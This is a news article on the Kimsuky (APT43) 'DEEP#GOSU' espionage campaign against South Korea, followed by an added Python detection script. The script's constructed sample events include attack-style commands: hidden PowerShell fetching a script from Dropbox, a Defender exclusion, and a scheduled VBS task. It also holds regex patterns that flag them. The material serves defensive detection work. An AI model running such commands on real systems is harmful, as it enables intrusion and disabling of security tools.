Group linked to North Korea launches eight-phase cyberattack on South Korea


The threat group Kimsuky, known for its connection to North Korea, has adopted an eight-phase attack chain in which the attackers abuse legitimate cloud services and deliver malware, aiming at cyber espionage and financial crime against entities in South Korea.

According to researchers at Securonix, the campaign attributed to the group, called “DEEP#GOSU”, is based on a “living off the land” strategy. The cyber espionage operators use commands to install a variety of .NET assemblies, which link to legitimate code components of .NET applications, to form the basis of the attacker’s toolkit.

To conduct its malicious operations, Kimsuky also uses LNK files attached to emails, command scripts downloaded from Dropbox, and code written in PowerShell and VBScript.

Typical cyberattacks use five or fewer phases; the DEEP#GOSU campaign, however, is based on eight. Oleg Kolesnikov, vice president of threat research at Securonix, explains that some of the tools can be detected by antivirus scanners and other defensive technologies, but that the attackers actively seek to avoid detection.

“There were many different components and payloads, and different payload components had different scanner detection rates,” clarifies Kolesnikov. “As attackers actively used security tool evasion and disruption techniques – including turning off security tools and adding payloads to exclusions, among others – the number of scanners that detected this was likely less relevant in this case.”

The Kimsuky group is also known as APT43, Emerald Sleet and Velvet Chollima, and it intensified its activity last year with a greater focus on cryptocurrencies, in addition to its traditional objective of cyber espionage.

Although Securonix’s threat analysis shows a slight evolution of the group, these attackers are notorious for their spearphishing rather than for their technical sophistication.

“Malware payloads… represent a sophisticated, multi-phase threat designed to stealthily operate on Windows systems, especially from a network monitoring perspective,” say the three researchers who carried out the analysis. “Each phase was encrypted using AES and a common password and IV [initialization vector] which should minimize network, or flat file scanning detections.”

The first stage of the attack begins when the victim opens an LNK file attached to an email, which triggers the download of PowerShell code from Dropbox. The code executed in the second phase then downloads additional scripts from Dropbox, and the third phase installs a remote access Trojan, TutClient, on the compromised system.

Securonix researchers argue in their analysis that the intense use of Dropbox and Google in the later stages helps to evade detection.

“All C2 communication is done through legitimate services such as Dropbox or Google Docs, allowing malware to blend in undetected with normal network traffic,” they wrote. “As these payloads were extracted from remote sources such as Dropbox, this allowed malware maintainers to dynamically update its functionality or deploy additional modules without direct interaction with the system.”

In addition, the later stages of the attack rely on installing a script that is executed at random intervals of a few hours, so that the attackers can keep monitoring and controlling the system. The final stage monitors user activity by recording keystrokes on the compromised system.

Detection rates for the initial phases of the attack range from 5% to 45% for host-based security tools. However, the analysis reveals that network security platforms may have some difficulty detecting the later stages of the attack, as the Kimsuky attackers rely on encrypted traffic, legitimate cloud file transfer services, and .NET components.
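As an added example (not from the article or from Securonix), the host-side view of the stages described above can be turned into simple correlation logic: the Python below runs a few rules over constructed Sysmon-style process-creation events and scores how many distinct stage indicators appear on one host. The Defender cmdlets in the sample and the scheduled-task persistence are assumed illustrations of the “turning off security tools / adding exclusions” and periodically executed script behaviours, not details the article provides.

```python
import re

# Constructed Sysmon-style process-creation events shaped like the DEEP#GOSU chain
# (explorer.exe spawning PowerShell that pulls from Dropbox, a Defender exclusion,
# a scheduled script); sample data only, not real telemetry.
SAMPLE_EVENTS = [
    {"pid": 41, "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -w hidden -ep bypass -c Invoke-WebRequest "
                "https://dl.dropboxusercontent.com/s/CONSTRUCTED/s1.ps1 -OutFile s1.ps1"},
    {"pid": 42, "parent": "powershell.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -c Add-MpPreference -ExclusionPath C:\\Users\\Public\\tmp"},
    {"pid": 43, "parent": "powershell.exe", "image": "schtasks.exe",
     "cmdline": "schtasks.exe /create /sc minute /mo 240 /tn Updater "
                "/tr \"wscript.exe C:\\Users\\Public\\tmp\\u.vbs\""},
    {"pid": 44, "parent": "services.exe", "image": "svchost.exe",
     "cmdline": "svchost.exe -k netsvcs"},  # benign noise, must not fire
]

CLOUD_HOSTS = re.compile(r"dropbox(usercontent)?\.com|docs\.google\.com", re.I)

# One predicate per stage indicator; each is weak on its own, which is the point.
RULES = {
    "shell_spawns_powershell_from_cloud": lambda e:
        e["parent"] in {"explorer.exe", "outlook.exe", "winword.exe"}
        and e["image"] == "powershell.exe" and bool(CLOUD_HOSTS.search(e["cmdline"])),
    # Assumed example of "turning off security tools / adding exclusions" (Defender cmdlets).
    "security_tool_tampering": lambda e: bool(re.search(
        r"Add-MpPreference\s+-Exclusion|Set-MpPreference\s+-Disable", e["cmdline"], re.I)),
    # Assumed persistence mechanism for the script that runs every few hours.
    "scripted_scheduled_task": lambda e:
        e["image"] == "schtasks.exe" and "/create" in e["cmdline"].lower()
        and bool(re.search(r"\.(ps1|vbs)\b|powershell|wscript", e["cmdline"], re.I)),
    "hidden_bypass_powershell": lambda e:
        e["image"] == "powershell.exe"
        and bool(re.search(r"-w(indowstyle)?\s+hidden", e["cmdline"], re.I))
        and bool(re.search(r"-e(xecutionpolicy|p)\s+bypass", e["cmdline"], re.I)),
}

def detect(events):
    """Map pid -> names of the rules that fired, for events hitting at least one."""
    hits = {}
    for e in events:
        names = [name for name, pred in RULES.items() if pred(e)]
        if names:
            hits[e["pid"]] = names
    return hits

def chain_score(events):
    """Number of distinct stage indicators seen on the host; several together are
    the signal worth alerting on, since any single stage may slip past a scanner."""
    return len({name for names in detect(events).values() for name in names})
```

A single rule hit is expected background noise in many environments; alerting on a chain score of three or more on one host is closer to the defence-in-depth posture the article recommends.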

“In our experience, in cases like this, up-to-date antivirus software may not be sufficient because the behaviors exhibited include disruption and evasion of security tools,” warns Kolesnikov. “Our recommendation is that organizations take advantage of defense in depth so they don’t rely solely on a specific security tool.”


The article is in Portuguese
